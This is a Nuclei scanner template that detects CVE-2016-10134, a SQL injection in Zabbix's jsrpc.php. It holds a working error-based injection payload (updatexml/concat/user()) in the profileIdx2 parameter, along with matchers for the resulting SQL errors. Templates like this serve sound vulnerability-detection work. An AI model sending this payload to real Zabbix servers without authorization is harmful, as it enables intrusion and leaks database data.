49 lines
1.9 KiB
YAML
49 lines
1.9 KiB
YAML
id: CVE-2016-10134
|
|
|
|
info:
|
|
name: Zabbix - SQL Injection
|
|
author: princechaddha
|
|
severity: critical
|
|
description: Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the Zabbix application and underlying systems.
|
|
remediation: |
|
|
Apply the latest security patches or upgrade to a patched version of Zabbix to mitigate the SQL Injection vulnerability (CVE-2016-10134).
|
|
reference:
|
|
- https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-10134
|
|
- https://support.zabbix.com/browse/ZBX-11023
|
|
- https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850936
|
|
- http://www.debian.org/security/2017/dsa-3802
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2016-10134
|
|
cwe-id: CWE-89
|
|
epss-score: 0.05366
|
|
epss-percentile: 0.92931
|
|
cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: zabbix
|
|
product: zabbix
|
|
tags: cve2016,cve,zabbix,sqli,vulhub
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'Error in query [INSERT INTO profiles (profileid, userid'
|
|
- 'You have an error in your SQL syntax'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022002af95be90d34c083687132956f3fddac7b02d6c5bde40cad1957ff829e41a4b022100bec226073019d0c0c6a39cd446db71450cea262f0ed5a9b880e9b6c6fb46f340:922c64590222798bb761d5b6d8e72950 |